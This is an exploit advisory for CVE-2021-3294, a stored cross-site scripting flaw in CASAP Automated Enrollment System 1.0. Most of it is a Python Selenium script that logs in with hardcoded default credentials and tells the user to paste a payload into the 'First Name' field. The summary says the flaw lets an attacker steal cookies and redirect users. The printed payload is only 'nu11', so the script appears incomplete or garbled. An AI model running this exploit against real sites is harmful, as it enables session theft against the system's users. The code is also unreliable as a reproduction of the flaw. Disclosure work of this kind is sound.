# Exploit Title: CASAP Automated Enrollment System 1.0 - 'First Name' Stored XSS # Author: nu11secur1ty # Date: 02.15.2021 # Vendor: https://www.sourcecodester.com/php/12210/casap-automated-enrollment-system.html # Software Athor: https://www.sourcecodester.com/users/yna-ecole # Link: https://github.com/nu11secur1ty/CVE-mitre/blob/main/CVE-2021-3294/CASAP.zip # Link Original: https://www.sourcecodester.com/download-code?nid=12210&title=CASAP+Automated+Enrollment+System+using+PHP%2FMySQLi+with+Source+Code # CVE: CVE-2021-3294 [+] Credits: (@ nu11secur1ty) [+] Website: https://www.nu11secur1ty.com/ [+] Source: https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-3294 [Exploit Program Code] #!/usr/bin/python3 # author @nu11secur1ty # For CVE-2021-3294 from selenium import webdriver from selenium.webdriver.common.by import By from selenium.webdriver.support.ui import WebDriverWait from selenium.webdriver.support import expected_conditions as EC import time import os #enter the link to the website you want to automate login. website_link="http://localhost/Final/index.php" #enter your login username username="yna.ecole" #enter your login password password="12345" #enter the element for username input field element_for_username="username" #enter the element for password input field element_for_password="password" #enter the element for submit button element_for_submit="login" #browser = webdriver.Safari() #for macOS users[for others use chrome vis chromedriver] browser = webdriver.Chrome() #uncomment this line,for chrome users #browser = webdriver.Firefox() #uncomment this line,for chrome users browser.get((website_link)) try: username_element = browser.find_element_by_name(element_for_username) username_element.send_keys(username) password_element = browser.find_element_by_name(element_for_password) password_element.send_keys(password) signInButton = browser.find_element_by_name(element_for_submit) signInButton.click() exploit="nu11" print("If everything is ok, please paste this in to the Users in section in First Name\n") print(exploit) except Exception: #### This exception occurs if the element are not found in the webpage. print("Some error occured :(") [Vendor] https://www.sourcecodester.com/users/yna-ecole [Vulnerability Type] XSS [CVE Reference] https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-3294 [Security Issue] CASAP Automated Enrollment System 1.0 is affected by cross-site scripting (XSS) in users.php. An attacker can steal a cookie to perform user redirection to a malicious website. [Video] https://www.youtube.com/watch?v=_nhIZyJ8rxM @nu11secur1ty https://www.nu11secur1ty.com/